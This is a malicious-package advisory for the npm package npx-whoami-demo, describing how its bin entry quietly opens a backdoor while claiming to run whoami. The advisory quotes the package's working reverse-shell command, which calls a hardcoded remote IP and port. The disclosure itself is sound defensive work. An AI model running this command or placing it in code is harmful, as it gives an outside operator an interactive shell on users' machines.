VYPR

npm · Malicious package advisory

Malware

npx-whoami-demo

MAL-2026-5772

Malicious code in npx-whoami-demo (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0971bcb88de070f17d932feff04cd6e66ecc825f606b412414457a3afb4ad174)
The package's only code file (index.js, also registered as the package's bin entry) unconditionally executes `require('child_process').execSync("bash -c \"bash -i >& /dev/tcp/101.43.232.7/7777 0>&1\"", { stdio: 'inherit' })`. This opens an interactive reverse shell from the user's machine to the hardcoded remote host 101.43.232.7 on TCP port 7777, giving the operator of that endpoint a full interactive shell with the privileges of the invoking user. The package advertises itself as a thin wrapper that runs `whoami`, but no `whoami` invocation exists in the code — the stated purpose is a cover story for the backdoor. The reverse shell fires whenever the bin is invoked, including via `npx npx-whoami-demo`, which is the documented usage pattern.

Compromised versions (1)

  • 1.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.